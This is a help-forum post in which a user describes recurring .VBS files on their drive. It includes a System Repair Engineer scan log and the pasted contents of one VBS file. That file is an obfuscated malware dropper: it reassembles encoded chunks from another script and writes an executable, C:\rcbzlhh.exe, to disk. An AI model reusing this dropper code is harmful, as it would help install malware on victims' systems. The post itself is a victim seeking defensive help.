[Help] What should I do about an infection with files ending in .VBS?

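Files ending in .VBS keep appearing on my C: drive for no reason, and every time I refresh, they get bigger. After a while two more show up. Both Kingsoft and 360 say they are not viruses, yet Kingsoft keeps popping up antivirus alerts all the time. This has been going on for almost 3 weeks....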

Addendum

I renamed the VBS file to a TXT file and opened it; this is what it contains:
on ErRoR rEsume NexT:W=1:Do:SET j=CReaTEObjEcT("SCrIPTIng.FILesYSTEMobjECT"):dO WHiLE J.FilEexIsts("C:\hxsydg.vbs")=fAlSE:wscRiPt.SlEEP(1000):looP:SEt l=J.oPeNtextFIlE("C:\hxsydg.vbs",1):do wHIlE L.ATeNdOFstREAm=FAlse:b=L.REAdLINE:Y=lEn(b):a=LeFT(B,2):seLecT CASE tRUE:cASe isnumERiC(a)=FalSE:CAsE Y=3949+3 aNd iNt(a)=W:u=U+miD(b,3,3949):w=W+1:cASe y=2534+3 And InT(A)=w:u=u+MiD(B,3,2534):W=w+1:END sELECT:LOOP:l.closE:IF 67+1=w tHEn:i=Len(U)/2:SEt P=cReATeObject("ADOdB.ReCOrDsET"):P.FIelDs.aPpEnd "m",205,I:P.opeN:P.adDneW:p("M")=u:P.UPDAte:u=P("m").getcHUNk(I):WItH CrEATEobJECT("ADOdb.sTReam"):.MODE=3:.tyPE=1:.oPeN():.wRiTe u:.saveTOFILe "C:\rcbzlhh.exe",2:eND With:WScRiPt.QuiT:End iF:wScRIPt.SlEEP(200):LOoP



The other one contains

Scan results

Code:
2008-09-21,14:55:16

System Repair Engineer 2.6.12.1018
Smallfrogs (http://www.KZTechs.com)

Windows XP Professional Service Pack 2 (Build 2600) - 管理权限用户 - 完整功能

以下内容被选中:
    所有的启动项目(包括注册表、启动文件夹、服务等)
    浏览器加载项
    正在运行的进程(包括进程模块信息)
    文件关联
    Winsock 提供者
    Autorun.inf
    HOSTS 文件
    进程特权扫描


启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    <ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe>  [(Verified)Microsoft Windows Publisher]
    <KavPFW><"E:\Kingsoft Internet Security 2008\KPFW32.EXE" -startup>  [(Verified)"Zhuhai  Kingsoft Software Co.,Ltd"]
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <load><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <RTHDCPL><RTHDCPL.EXE>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]
    <Alcmtr><ALCMTR.EXE>  [(Verified)Microsoft Windows Hardware Compatibility Publisher]
    <amd_dc_opt><C:\Program Files\AMD\Dual-Core Optimizer\amd_dc_opt.exe>  [AMD]
    <360Safetray><D:\360safe\safemon\360tray.exe /start>  [(Verified)Qizhi Software (beijing) Co. Ltd]
    <360Safebox><"C:\Program Files\360Safebox\safeboxTray.exe" /r>  [(Verified)Qizhi Software (beijing) Co. Ltd]
    <KavStart><"E:\Kingsoft Internet Security 2008\KAVStart.exe" -startup>  [(Verified)"Zhuhai  Kingsoft Software Co.,Ltd"]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <shell><Explorer.exe>  [(Verified)Microsoft Windows Component Publisher]
    <Userinit><C:\WINDOWS\system32\userinit.exe>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <AppInit_DLLs><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <UIHost><logonui.exe>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
    <Internet Explorer><%systemroot%\system32\shmgrate.exe OCInstallUserConfigIE>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
    <Outlook Express><%systemroot%\system32\shmgrate.exe OCInstallUserConfigOE>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
    <Themes Setup><%SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
    <Microsoft Outlook Express 6><"%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install>  [File is missing]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
    <NetMeeting 3.01><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
    <Windows Messenger 4.7><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser>  [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
    <Microsoft Windows Media Player><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp10.inf,PerUserStub>  [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
    <通讯簿 6><"%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install>  [File is missing]
[HKEY_CURRENT_USER\Control Panel\Desktop]
    <SCRNSAVE.EXE><C:\WINDOWS\system32\夜光时钟.scr>  []

==================================
启动文件夹
[宽带连接]
  <C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\宽带连接.lnk -->  [File is missing]><N>

==================================
服务
[Adobe LM Service / Adobe LM Service][Stopped/Manual Start]
  <"C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe"><Adobe Systems>
[Ati HotKey Poller / Ati HotKey Poller][Stopped/Disabled]
  <C:\WINDOWS\system32\Ati2evxx.exe><ATI Technologies Inc.>
[Contrl Center of Storm Media / ccosm][Running/Auto Start]
  <E:\暴风影院\stormliv.exe /asservice><北京暴风网际科技有限公司>
[Kingsoft Internet Security Common Service / KISSvc][Running/Auto Start]
  <E:\Kingsoft Internet Security 2008\KISSvc.EXE><Kingsoft Corporation>
[Kingsoft Personal Firewall Service / KPfwSvc][Running/Auto Start]
  <"E:\Kingsoft Internet Security 2008\KPfwSvc.EXE"><Kingsoft Corporation>
[Kingsoft Antivirus KWatch Service / KWatchSvc][Running/Auto Start]
  <"E:\Kingsoft Internet Security 2008\KWatch.EXE"><Kingsoft Corporation>

==================================
驱动程序
[aaatimeo / aaatimeo][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\aaatimeo.sys><Microsoft Corporation>
[Intel(r) 82801 Audio Driver Install Service (WDM) / ac97intc][Stopped/Manual Start]
  <system32\drivers\ac97intc.sys><Intel Corporation>
[AFAMgt / AFAMgt][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\afamgt.sys><Adaptec, Inc.>
[ahcix86 / ahcix86][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ahcix86.sys><ATI Technologies Inc.>
[AliIde / AliIde][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\aliide.sys><Acer Laboratories Inc.>
[AMD AGP Bus Filter Driver / amdagp][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\amdagp.sys><Advanced Micro Devices, Inc.>
[amdbusdr / amdbusdr][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\amdbusdr.sys><AMD>
[AMD EIDE 驱动程衼E / amdeide][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\AmdEide.sys><AMD>
[AMD Processor Driver / AmdK8][Running/System Start]
  <System32\DRIVERS\amdk8.sys><Advanced Micro Devices>
[AMD Low Level Device Driver / AmdLLD][Running/Manual Start]
  <system32\DRIVERS\AmdLLD.sys><AMD, Inc.>
[SiI-3112 SATALink  Controller / ASH1205][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ASH1205.sys><Silicon Image, Inc.>
[ata1200a / ata1200a][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ata1200a.sys><Adaptec, Inc.>
[ati2mtag / ati2mtag][Running/Manual Start]
  <system32\DRIVERS\ati2mtag.sys><ATI Technologies Inc.>
[atiide / atiide][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\atiide.sys><ATI Technologies Inc.>
[Promise driver accelerator / bb-run][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\bb-run.sys><Promise Technology, Inc.>
[DELL CERC SATA 1.5/6ch RAID Miniport Driver / cercsr6][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\cercsr6.sys><Adaptec, Inc.>
[CmdIde / CmdIde][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\cmdide.sys><CMD Technology, Inc.>
[Cpq32fs2 / Cpq32fs2][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\Cpq32fs2.sys><Hewlett-Packard Company>
[Promise Removable Disk Control Driver / dontgo][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\DontGo.sys><Promise Technology, Inc.>
[VIA PCI 10/100Mb Fast Ethernet Adapter NT Driver / FETNDIS][Stopped/Manual Start]
  <system32\DRIVERS\fetnd5.sys><VIA Technologies, Inc.>
[fttxr52P / fttxr52P][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\fttxr52P.sys><Promise Technology, Inc.>
[Microsoft 用于 High Definition Audio 的 UAA 总线驱动程序 / HDAudBus][Running/Manual Start]
  <system32\DRIVERS\HDAudBus.sys><Windows (R) Server 2003 DDK provider>
[HpCISSm2 / HpCISSm2][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\HpCISSm2.sys><Hewlett-Packard Company>
[hptmv6 / hptmv6][Stopped/Boot Start]
  <\SystemRoot\system32\DRIVERS\hptmv6.sys><HighPoint Technologies, Inc.>
[Intel  RAID Controller / iaStor55][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\iaStor55.sys><Intel Corporation>
[Intel RAID  Controller / iaStor70][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\iaStor70.sys><Intel Corporation>
[Service for Realtek HD Audio (WDM) / IntcAzAudAddService][Running/Manual Start]
  <system32\drivers\RtkHDAud.sys><Realtek Semiconductor Corp.>
[KAVBase / KAVBase][Running/Auto Start]
  <\??\C:\WINDOWS\system32\Drivers\KAVBase.sys><Kingsoft Corporation>
[KAVBootC / KAVBootC][Running/Boot Start]
  <\SystemRoot\system32\Drivers\KAVBootC.sys><Kingsoft Corporation>
[KAVSafe / KAVSafe][Running/Auto Start]
  <\??\C:\WINDOWS\system32\Drivers\KAVSafe.sys><Kingsoft Corporation>
[KNetWch / KNetWch][Running/System Start]
  <\??\E:\Kingsoft Internet Security 2008\KNetWch.SYS><Kingsoft Corporation>
[KWatch3 / KWatch3][Running/Auto Start]
  <\??\C:\WINDOWS\system32\Drivers\KWatch3.sys><Kingsoft Corporation>
[mv61xx / mv61xx][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\mv61xx.sys><Marvell Semiconductor, Inc.>
[mvSata / mvSata][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\mvsata.sys><Marvell Semiconductors Inc.>
[nv / nv][Stopped/Manual Start]
  <system32\DRIVERS\nv4_mini.sys><NVIDIA Corporation>
[NVATABUS / NVATABUS][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\nvatabus.sys><NVIDIA Corporation>
[NVIDIA nForce Networking Controller Driver / NVENETFD][Running/Manual Start]
  <system32\DRIVERS\NVENETFD.sys><NVIDIA Corporation>
[nvgts / nvgts][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\nvgts.sys><NVIDIA Corporation>
[NVIDIA Network Bus Enumerator / nvnetbus][Running/Manual Start]
  <system32\DRIVERS\nvnetbus.sys><NVIDIA Corporation>
[NVIDIA nForce RAID Driver / nvrd32][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\nvrd32.sys><NVIDIA Corporation>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
  <system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[ql2100 / ql2100][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ql2100.sys><QLogic Corporation>
[ql2200 / ql2200][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ql2200.sys><QLogic Corporation>
[rr172x / rr172x][Stopped/Boot Start]
  <\SystemRoot\system32\DRIVERS\rr172x.sys><HighPoint Technologies, Inc.>
[rr174x / rr174x][Stopped/Boot Start]
  <\SystemRoot\system32\DRIVERS\rr174x.sys><HighPoint Technologies, Inc.>
[rr2340 / rr2340][Stopped/Boot Start]
  <\SystemRoot\system32\DRIVERS\rr2340.sys><HighPoint Technologies, Inc.>
[SafeBoxKrnl / SafeBoxKrnl][Running/System Start]
  <\??\C:\Program Files\360Safebox\SafeBoxKrnl.sys><360安全中心>
[Secdrv / Secdrv][Stopped/Manual Start]
  <system32\DRIVERS\secdrv.sys><Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.>
[SATALink External Device Filter / SiRemFil][Running/Boot Start]
  <\SystemRoot\system32\DRIVERS\SiRemFil.sys><Silicon Image, Inc.>
[SIS AGP Bus Filter / sisagp][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\sisagp.sys><Silicon Integrated Systems Corporation>
[sisraidx / sisraidx][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\sisraidx.sys><Silicon Integrated Systems Corp.>
[ViBus / ViBus][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ViBus.sys><VIA Technologies, Inc.>
[videX32 / videX32][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\videX32.sys><VIA Technologies, Inc.>
[VIA SATA IDE Device Driver / ViPrt][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\ViPrt.sys><VIA Technologies, Inc.>
[VIA SATA IDE Hot-plug Driver / xfilt][Stopped/Disabled]
  <\SystemRoot\system32\DRIVERS\xfilt.sys><VIA Technologies,Inc>

==================================
浏览器加载项
[ThunderAtOnce Class]
  {01443AEC-0FD1-40fd-9C87-E93D1494C233} <D:\讯雷\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[Thunder Browser Helper]
  {889D2FEB-5411-4565-8998-1DD2C5261283} <D:\讯雷\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[SafeMon Class]
  {B69F34DD-F0F9-42DC-9EDD-957187DA688D} <D:\360safe\safemon\safemon.dll, (Signed) 360.CN>
[kingsoft browser shield]
  {D963BE1A-6B35-47DB-B002-49FAE71D85CC} <E:\Kingsoft Internet Security 2008\KASBrowserShield.DLL, (Signed) Kingsoft Corporation>
[IEBuddyExtControl Class]
  {3AECD3C1-7085-4731-96DC-47B6CF7EF749} <E:\Kingsoft Internet Security 2008\IEBuddyExt.DLL, (Signed) Kingsoft Corporation>
[ThunderAtOnce Class]
  {01443AEC-0FD1-40FD-9C87-E93D1494C233} <D:\讯雷\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[IEBuddyExtControl Class]
  {3AECD3C1-7085-4731-96DC-47B6CF7EF749} <E:\Kingsoft Internet Security 2008\IEBuddyExt.DLL, (Signed) Kingsoft Corporation>
[Thunder Agent Class]
  {485463B7-8FB2-4B3B-B29B-8B919B0EACCE} <D:\讯雷\Thunder\ComDlls\ThunderAgent_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[360SafeLive]
  {87515F61-A66C-4319-A0E0-D416CB8059E3} <D:\360safe\live.dll, (Signed) 360.cn>
[Thunder Browser Helper]
  {889D2FEB-5411-4565-8998-1DD2C5261283} <D:\讯雷\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[SafeMon Class]
  {B69F34DD-F0F9-42DC-9EDD-957187DA688D} <D:\360safe\safemon\safemon.dll, (Signed) 360.CN>
[kingsoft browser shield]
  {D963BE1A-6B35-47DB-B002-49FAE71D85CC} <E:\Kingsoft Internet Security 2008\KASBrowserShield.DLL, (Signed) Kingsoft Corporation>
[]
  {FB5F1910-F110-11D2-BB9E-00C04F795683} <, >
[使用迅雷下载]
  <D:\讯雷\Thunder\Program\geturl.htm, N/A>
[使用迅雷下载全部链接]
  <D:\讯雷\Thunder\Program\getallurl.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
  <res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
[添加到QQ表情]
  <D:\qq2008\AddEmotion.htm, N/A>

==================================
正在运行的进程
[PID: 628 / SYSTEM][\SystemRoot\System32\smss.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 692 / SYSTEM][\??\C:\WINDOWS\system32\csrss.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 732 / SYSTEM][\??\C:\WINDOWS\system32\winlogon.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [C:\WINDOWS\system32\Ati2evxx.dll]  [ATI Technologies Inc., 6.14.10.4176]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 776 / SYSTEM][C:\WINDOWS\system32\services.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 788 / SYSTEM][C:\WINDOWS\system32\lsass.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 964 / SYSTEM][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1008 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1104 / SYSTEM][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1188 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1268 / LOCAL SERVICE][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1596 / SYSTEM][C:\WINDOWS\system32\spoolsv.exe]  [Microsoft Corporation, 5.1.2600.2696 (xpsp_sp2_gdr.050610-1519)]
[PID: 1788 / Administrator][C:\WINDOWS\Explorer.EXE]  [Microsoft Corporation, 6.00.2900.3156 (xpsp_sp2_gdr.070613-1234)]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [D:\讯雷\Thunder\ComDlls\TDAtOnce_Now.dll]  [Thunder Networking Technologies,LTD, 1.0.5.29]
    [D:\讯雷\Thunder\ComDlls\xunleiBHO_Now.dll]  [Thunder Networking Technologies,LTD, 5, 0, 8, 96]
    [C:\WINDOWS\system32\Audiodev.dll]  [Microsoft Corporation, 5.2.3802.3802 built by: dnsrv(bld4act)]
    [C:\Program Files\WinRAR\rarext.dll]  [N/A, ]
    [C:\Program Files\Microsoft Office\OFFICE11\msohev.dll]  [Microsoft Corporation, 11.0.5510]
    [E:\Kingsoft Internet Security 2008\KAVEXT.DLL]  [Kingsoft Corporation, 2008,07,09,459]
    [D:\qq2008\qdshm.dll]  [, 1, 0, 101, 20]
    [D:\qq2008\MFC42.DLL]  [Microsoft Corporation, 6.00.8665.0]
[PID: 1936 / SYSTEM][E:\暴风影院\stormliv.exe]  [北京暴风网际科技有限公司, 3, 8, 8, 15]
    [E:\暴风影院\MSVCP60.dll]  [Microsoft Corporation, 6.02.3104.0]
    [E:\暴风影院\bfoptdll.dll]  [北京暴风网际科技有限公司, 3, 8, 7, 16]
    [E:\暴风影院\box\BoxLog.dll]  [北京暴风网际科技有限公司, 3, 8, 9, 19]
[PID: 2028 / LOCAL SERVICE][C:\WINDOWS\system32\wdfmgr.exe]  [Microsoft Corporation, 5.2.3790.1230 built by: dnsrv(bld4act)]
[PID: 196 / Administrator][C:\WINDOWS\RTHDCPL.EXE]  [Realtek Semiconductor Corp., 2.1.9.1]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
[PID: 996 / Administrator][C:\WINDOWS\system32\ctfmon.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2092 / Administrator][D:\qq2008\QQ.exe]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQBaseClassInDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQHelperDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\BasicCtrlDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\MFC42.DLL]  [Microsoft Corporation, 6.00.8665.0]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [D:\qq2008\RICHED32.DLL]  [Microsoft Corporation, 5.00.2134.1]
    [D:\qq2008\RICHED20.dll]  [Microsoft Corporation, 5.31.23.1218]
    [D:\qq2008\QQAPI.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LoginCtrl.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LoginCtrlRes.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQRes.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQMainFrame.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\gdiplus.dll]  [Microsoft Corporation, 5.1.3102.3352 (xpsp_sp2_qfe.080415-1302)]
    [D:\qq2008\QQPlugin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\UnReadMsgMgr.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAllInOne.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\SCCore.dll]  [TENCENT, 1, 6, 0, 2]
    [D:\qq2008\CameraDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\CQQApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\FlashAvatarDll.dll]  [, 1, 0, 0, 1]
    [D:\qq2008\NewSkin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\MailSummary.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQSpace.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\vbscript.dll]  [Microsoft Corporation, 5.6.0.7426]
    [E:\Kingsoft Internet Security 2008\Flash.OCX]  [Adobe Systems, Inc., 9,0,124,0]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\msdmo.dll]  [, ]
    [D:\qq2008\OEMApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAvatar.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQKnowledgeSearch.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQGroupMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQPet.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QRingMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQSysMsgMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\UserDefinedHead.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQConfigPlugin.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQCustomFace.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\LongConnection.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\PhoneAPI.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\DialerAllinOne.dll]  [tencent, 1, 4, 0, 0]
    [C:\WINDOWS\system32\msadp32.acm]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
    [D:\qq2008\BQQApplication.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\CommercesMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\PersonalDesktop.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQAddr.dll]  [深圳市腾讯计算机系统有限公司, 5, 0, 101, 330]
    [D:\qq2008\GroupConnection.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\ImageOle.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQSceneMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQLiveQMng.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\qqgroupdisk.dll]  [深圳腾讯科技, 2, 6, 106, 90]
    [D:\qq2008\AddrSearch.dll]  [腾讯科技(深圳)有限公司, 2, 2, 1, 16]
    [D:\qq2008\QQSettingCtrl.dll]  [TENCENT, ]
[PID: 2524 / LOCAL SERVICE][C:\WINDOWS\System32\alg.exe]  [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2860 / Administrator][C:\WINDOWS\ALCFDRTM.EXE]  [Realtek Semiconductor Corp., 1, 3, 0, 1]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
[PID: 3756 / Administrator][D:\qq2008\TXPlatform.exe]  [Tencent, 1, 5, 225, 0]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [E:\Kingsoft Internet Security 2008\KMailOEBand.DLL]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\kis.dll]  [Kingsoft Corporation, 2008,04,22,364]
    [E:\Kingsoft Internet Security 2008\MFC80U.DLL]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [E:\Kingsoft Internet Security 2008\MSVCP80.dll]  [Microsoft Corporation, 8.00.50727.762]
[PID: 3176 / Administrator][D:\qq2008\QQ.exe]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQBaseClassInDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\QQHelperDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\BasicCtrlDll.dll]  [TENCENT, 8,0,978,1833]
    [D:\qq2008\MFC42.DLL]  [Microsoft Corporation, 6.00.8665.0]
    [D:\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
